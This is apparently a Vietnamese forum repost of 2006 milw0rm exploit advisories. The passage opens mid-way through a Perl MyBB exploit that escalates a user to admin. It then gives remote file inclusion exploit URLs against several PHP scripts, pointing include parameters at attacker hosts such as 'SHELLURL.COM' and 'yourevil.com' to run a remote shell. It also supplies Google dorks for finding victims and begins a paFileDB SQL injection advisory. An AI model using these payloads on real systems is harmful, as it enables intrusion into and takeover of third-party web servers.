#GreetZ : Bl@Ck^B1rd Semsemmasr Black_Scorpion Medo_Ye7ya Kambaa NANA Kashtawa #Skiing Gendiaaa Saw AzIZa SnIpEr_Sa Masry OSA FEGLA 3amer # milw0rm.com [2006-08-01] vns3curityHCE newsRe
Trang 1],);
if($cookie_jar->as_string =~ /mybbuser=(.*?);/) {
print "successfully \n";
} else {
print "UNsuccessfully !\n";
print " [-] Can not Login In $host !\n";
exit();
}
$req = $xpl->get($url.'usercp.php?action=do_options&showcodebu
ttons=1\',additionalgroups=\'4');
$tst = $xpl->get($url.'index.php');
if ($tst->as_string =~ /Admin CP/) {
print " [+] You Are Admin Now !!";
} else {
print " [-] Exploit Failed !";
}
# milw0rm.com [2006-06-25]
vns3curity(HCE)
NewsLetter <= 3.5 (NL_PATH) Remote File Inclusion Vulnerability
Code:
#==========================================================
=======
#NewsLetter v3.5 <= (NL_PATH) Remote File Inclusion Exploit
Trang 2======
# |
#Critical Level : Dangerous |
# |
#Venedor site : http://knusperleicht.at/ |
# |
#Version : 3.5 |
# |
#========================================================== ======= #Bug in : index.php # #Vlu Code : # -
# /**
# * Erforderliche Datein einbinden # */ # # require ("$NL_PATH"."inc/config.inc.php"); # require ("$NL_PATH"."inc/engine.inc.php"); # #/** #========================================================== ======= # #Exploit : # -
#
#http://sitename.com/[Script
Path]/index.php?NL_PATH=http://SHELLURL.COM?
#
#==========================================================
=====================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
Trang 3#GreetZ : Bl@Ck^B1rd Semsemmasr Black_Scorpion Medo_Ye7ya Kambaa NANA Kashtawa
#Skiing Gendiaaa Saw AzIZa SnIpEr_Sa Masry OSA FEGLA 3amer
# milw0rm.com [2006-08-01]
vns3curity(HCE)
newsReporter <= 1.1 (index.php) Remote Inclusion Vulnerability
Code:
>>> Kurdish Security
>>> newsReporter v1.1 Remote Command Execution
>>> Freedom For Ocalan
>>> Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com
>>> Rish : High
>>> Class : Remote
>>> Script : newsReporter
>>> Site : http://www.knusperleicht.at
Code :
// removed the old code because it was not correct /str0ke
// INCLUDE PATH
@define(NEWS_INCLUDE_PATH, $news_include_path);
// INCLUDE PATH
//Dateien importieren
include NEWS_INCLUDE_PATH."inc/config.inc.php";
Vulnerability :
Trang 4http://www.site.com/[scriptpath]/index.php?news_include_path=[script]
# milw0rm.com [2006-08-01]
vns3curity(HCE)
Newxooper-php 0.9.1 (mapage.php) Remote File Include Vulnerability
Code:
##################################################################
#########################
#Newxooper-php v0.9.1(chemin) Remote File Include Vulnerabilty #
#Download:http://www.easy-script.com/newxoope-091.zip #
##################################################################
#########################
#Author:Dr Max Virus #
#Location:Egypt #
##################################################################
#########################
#Bug in compteur/mapage.php #
#In Line:37 #
#Vul Code: #
#REQUIRE ("$chemin/compteur/mapage.txt"); #
##################################################################
#########################
#POC: #
#http://[target]/[path]/compteur/mapage.php?chemin=Evil Code #
##################################################################
#########################
#Thx:str0ke & ajann &All friends #
#Special Gr33ts:AsianEagle & The master & Kacper & Hotturk #
##################################################################
#########################
black_hat_cr(HCE)
Trang 5Open Bulletin Board 1.0.8 ; Multiple Remote File Include Vulnerabilities
+ Affected Software : Software
+ Version : Open Bulletin Board 1.0.8
+ Venedor : _http://www.openbb.com
+ Class : Remote File Inclusion
+ Risk : high (Remote File Execution)
+ Discovered by : Eddy_BAck0o
+ Contact : l0x3[at]hotmail.com
+2 đoạn bị bug (trong file base.php)
Code:
require $root_path "base.php";
require $root_path "base.php";
kiếm victim trong google với:
Code:
Powered by Open Bulletin Board
Xploit:
Code:
http://www.victim.com/index.php?root_path=http://yourevil.com/r0x.txt?cmd
black_hat_cr(HCE)
paFileDB 3.5.2/3.5.3 Remote Login Bypass SQL Injection Vulnerability
Code:
# PafileDB Login SQL injection =)
# author : koray & manyak@mypower.org
# Risk : High
# Class : Remote
# Vulnerable Script : pafileDB
# Version : 3.5.2 / 3.5.3
# google : powered by pafiledb 3.5.3/2